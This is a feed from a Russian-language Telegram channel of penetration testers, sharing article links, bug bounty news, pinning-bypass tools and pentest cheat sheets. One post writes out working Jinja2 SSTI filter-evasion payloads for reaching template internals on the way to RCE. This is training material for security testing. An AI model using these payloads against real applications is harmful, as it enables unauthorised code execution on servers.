GigaHackers
2.26K subscribers
60 photos
2 videos
10 files
58 links
Информация предоставлена исключительно в образовательных или исследовательских целях. Противоправные деяния преследуются по закону.
Авторы: @WILD_41, @Oki4_Doki и @VlaDriev
加入频道
[Bitrix24 pwn]

Всем привет!👋

Наткнулся на интересную статью о компрометации Bitrix24. Из ключевого:
Компрометация через мобильное приложение
Много OSINT

Ломаем корпоративный портал Bitrix24 через мобильное приложение.

Всегда старайтесь проявлять креатив и смотреть чуть шире и скорее всего все получится 👍

#bitrix24 #pwn #osint
Please open Telegram to view this post
VIEW IN TELEGRAM
[IP-камеры на пентестах. Используем видеокамеры не по назначению]

Всем привет!👋

Вышла моя статья на xakep. В статье разбирается 4 кейса компрометации камеры:

🔘 Кейс 1: пароль по умолчанию
🔘 Кейс 2: уязвимость в прошивке
🔘 Кейс 3: хардкод в прошивке
🔘 Кейс 4: модификация прошивки

Если знаете статьи с ресерчами камер, киньте в комменты, пожалуйста 💓

#xakep #cameras #magazine #GigaHackers
Please open Telegram to view this post
VIEW IN TELEGRAM
[Минута мотивации для этичных хакеров]

Всем привет!👋

Недавно я решил попробовать себя в Bug Bounty. Пока уязвимости не такие крутые, но тем не менее уже удалось получить свою первую ачивку, чему очень рад!

Если бы мне ещё пол года назад сказали, что у меня будет хотя бы 1 подтвержденный репорт - я бы не поверил сразу :)

Всегда приятно получать символические презенты в деле, которое тебе искренне нравится. Это создает соревновательный дух и дополнительно мотивирует двигаться дальше в нашей сфере🦾

Помните, что всему можно научиться. Никто не рождается гуру-хакером из коробки. Уверен, что труд и прилежание всегда окупаются. Двигайтесь вперед, планомерно, в своем темпе, но на регулярной основе. И не останавливайтесь на достигнутом, тогда вас обязательно ждет успех!🔥

P/S Есть ли ещё багхантеры среди нас? Пишите в комментарии👍🏻

#bug_bounty #motivation
This media is not supported in your browser
VIEW IN TELEGRAM
[📱iOS — cниффим трафик Flutter приложения]

Всем привет! 👋

Недавно столкнулся с приложением на flutter для iOS. Данный фреймворк имеет некоторые особенности в плане работы с протоколом HTTP.
Особенность заключается в том, что некоторые приложения Flutter/Dart могут использовать встроенные сертификаты вместо системных, что делает невозможным использование пользовательских сертификатов, установленных на устройстве. Также одной из причин может быть игнорирование стандартных настроек прокси, которые обычно используются для перенаправления трафика в Burp.

Данная тема не обходится через стандартный objection, однако ИБ комьюнити выручает и можно использовать, например, скрипты ниже для проксирования и обхода пиннинга.

💻 https://github.com/hackcatml/frida-flutterproxy - проксирование через бурп
💻 https://codeshare.frida.re/@zionspike/bypass-flutter-pinning-ios/ - скрипт для обхода пиннинга


#mobile #appsec
[ Bitrix — поговорим о наболевшем ]

Всем привет!👋

Многие неоднократно слышали о CMS Bitrix — весьма удобная система для управления сайтом. Однако сильно уязвимая из "коробки". Об эксплуатации многих нюансов и уязвимостей было не раз сказано в комьюнити этичных хакеров.

Сейчас я хочу внести свой скромный вклад и рассказать о замеченных мною недостатках и особенностях этой CMS.

Данные мелочи не раз помогали мне как на Bug Bounty, так и на проектах по внешнему пентесту.

Надеюсь, что эти маленькие нюансы в сумме смогут помочь вам и вашей команде на проектах.

Приятного чтения:)

#bitrix24 #web #bug_bounty
[Abuse ACL AD]

Всем привет! 👋

Большое спасибо нашему другу @Michaelzhm за крутой 🔥🔥🔥 доклад в рамках нашей летней практики

➡️ Доклад можно найти на его канале здесь

➡️ Также залили видос на YouTube

Приятного просмотра! 🖥

#AD #start #learn #ACL
Please open Telegram to view this post
VIEW IN TELEGRAM
Media is too big
VIEW IN TELEGRAM
[ Если делаешь — делай с душой ]

С коллегами запустили мини-стенд в рамках летней практики для наших практикантов

Немного вдохновились и решили сделать видео 😎
Нашим практикантам удачи, а остальным рекомендуем залетать к нам на летнюю практику на будущий год 🤙🏼

#learn #start #brickoff
[Пентесты ОКИИ]

Всем привет!👋

В работе пентестера встречаются не только ламповые проекты, которые делаются удаленно из офиса, но и хардовые проекты с выездом на объекты к заказчику. Площадка может быть абсолютно любая, в частности относиться к ОКИИ 🏭🏦🏥

Коллеги из нашей команды подготовили крутой и полезный материал для всех, кто интересуется пентестами 🔥

📣 Для посещения регистрируйтесь заранее!
01.08.24 в 12:00 по Мск
Please open Telegram to view this post
VIEW IN TELEGRAM
[Полезные ссылки]

Всем привет! 👋

Сегодня у нас полезная информация для начинающих!

Невозможно запомнить каждую команду в голове, для этого существуют заметки.📝 Хочу поделиться ссылками на различные агрегаторы информации, которыми мы частенько пользуемся в работе.

📌 HackTricks - заметки на каждый день обо всем про пентест (про конкретные порты, службы, сервисы)

📌 The Hacker Recipes - годнота в основном про AD (готовые команды и рецепты на все случаи жизни)

📌 PayloadAllTheThings - репозиторий, содержащий различные словари для самых разных проверок, а также наборы техник и чеклистов под конкретные продукты, например AD

📌 Pentester's Promiscuous Notebook - крутые и очень полезные заметки пентестера

📌 Red Team Notes - заметочки с уклоном в red team

Пишите в комментария, чем пользуетесь лично вы? ✏️

#learn #start
Please open Telegram to view this post
VIEW IN TELEGRAM
[Pentest award]

Всем привет! 👋

Хочу поделиться с вами радостным событием. В пятницу 2 августа прошла церемония награждения пентестеров, известная как Pentest award 2024 👑

В этом году участников стало больше, кейсы интереснее, и масштаб самой церемонии конечно увеличился!

В этом году мы с @WILD_41 попали в шорт-лист в нескольких номинациях.
Мой кейс в итоге удостоился 2 места в номинации "девайс", чему я безгранично рад! 🥈

Также хочется сказать огромное спасибо организаторам за шикарную подготовку мероприятия, жюри за проделанную работу по отбору кейсов. А победители в своих номинациях поистине крутые!

Всем, кто с мог прийти лично - отдельный респект, круто пообщались 💬

#pentestaward
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Всем привет👋

Пока @WILD_41 и @VlaDriev ожидали результатов премии pentest award, я успел получить презенты за акцию от TimeWeb в рамках их BB программы.

Спасибо большое @bizone_bb и @timewebru за подарки. Вы делаете крутые вещи в сфере bug bounty!💪

А я снова скажу: не бойтесь пробовать и продолжайте развиваться, всё возможно👍

#bug_bounty
[PoC Windows Downdate]

Всем привет!👋

Не так давно отгремели конференции Black Hat 2024 и DEF CON 32. Лучшие исследователи со всего мира поделились своими наработками. Хочу отметить несколько из них, которые меня заинтересовали. Публиковать буду постепенно, так как контента достаточно много.

Первый доклад, который меня зацепил - Windows Downdate: Downgrade Attacks Using Windows Updates

Автор рассказал как можно понизить версии отдельных файлов через центр обновления Windows и тем самым сделать ОС уязвимой к старым проблемам! 👍
Для понимания рекомендую к прочтению публикацию 📝

💻 И уже даже есть PoC с примерами от автора!

🐤 Ну и конечно ссылка на автора.


#Windows #PoC #AD #DC32 #BH2024 #CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
Работаешь в IT или с IT? Тогда тебе точно понравится на UIC DEV 2024! 💥

🖥 UIC Dev - ежегодная Технологическая конференция для специалистов из интернет-сферы: от HR-ов до IT-директоров. Да, мы не только для разработчиков, но и для аналитиков, тестировщиков, дизайнеров, маркетологов, SEO-шников, копирайтеров и т.д.

В этом году на нашей 7-ой вечеринке тебя ждут:

🎯 6 больших направлений по несколько секций: разработка, управление и анализ, бизнес+IT, дизайн и контент, маркетинг и digital, UIC Talks.
🎯 80+ докладов про инструменты, кейсы, "боли" IT-сообщества, AI и будущее.
🎯 Обсуждение актуальных событий, разбор трендов из области IT и не только.
🎯 Общение с единомышленниками, дискуссии, обмен опытом, новые идеи.
🎯 Интерактивы и розыгрыши призов на стендах партнеров.

Вечером первого дня пройдет 🔥 афтепати с выступлением группы “Стихи на окнах подъезда №8”, дискотекой, лайтовым общением и развлечениями. 🚀

📅 7-8 октября 2024 г.
📍 ТРЦ “Сигма”, г. Ижевск, пер. Широкий, 53, 3-4 эт.
❗️ Подробности: uic.dev и vk.com/uicdev
Please open Telegram to view this post
VIEW IN TELEGRAM
[Обход фильтров в SSTI в Jinja2]

Не так давно в рамках подготовки к OSWE столкнулся с необходимостью обходить фильтры SSTI, проверяющие непосредственный темплейт.
Уязвимое приложение проверяло наличие .__ в строке передаваемого темплейта, что не давало просто использовать пейлоад из HackTricks и наслаждаться RCE на уязвимой машине.
Поэтому ловите несколько способов модификации пейлоада, чтобы обойти подобные фильтры или даже WAF целиком:

🔸 Для обхода фильтра по .__ можно использовать |attr()
{{ ''|attr('__class__’)}}

🔸 Можно использовать сложение строк или закодировать
{{request|attr("__"+"class"+"__")}}
{{''['\x5f\x5fclass\x5f\x5f']}}

🔸 Также можно обратиться к атрибутам по индексу
request["__class__"]

🔸 Кроме того, можно использовать Statements для определения переменных в темплейте
{% set string = "ssti" %}

{% set class = "__class__" %}

{{ string|attr(class)}}

{% with a = config.__class__.mro()[-1].__subclasses__() %} {{ a }} {% endwith %}

🔸 Для обхода фильтра по __ можно использовать requests.args для передачи частей полезной нагрузки в параметрах запроса и |join для соединения элементов в одну строку
{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}&class=class&usc=_

🔸 Для обхода фильтра по [] можно использовать |getlist(). Данный метод возвращает всех значения, связанные с определенным ключом в запросе
{{request|attr(request.args.getlist(request.args.l)|join)}}&l=a&a=_&a=_&a=class&a=_&a=_


🔸 В случае, если встретился фильтр по |join, можно использовать |format для форматирования строк по переданным значениями
{{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_


Конечно количество фильтров может быть разнообразным, но тут уже скорее встает вопрос комбинации предложенных выше методов. 👆


Для закрепления я разработал небольшой стенд 🔥. Кому будет интересно, то можете проверить знания и навыки в деле!

@GigaHack

#web #stand #SSTI #learn #OSWE
[Полезный читшит для SSRF, CORS и open-redirect]

В последнее время у portswigger-а активно пополняются заметки по различным темам. Эта шпаргалка содержит полезные нагрузки для обхода проверки URL. Приведенные списки слов полезны для реализации следующих типов атак: SSRF, неправильные конфигурации CORS и open-redirect. Очень полезно, если кончились идеи, а ошибку с кодом 403 обходить надо. Также будет полезно и тем, кто только погружается историю с данными веб-уязвимостями.

https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet


#web #bypass #cheet_sheet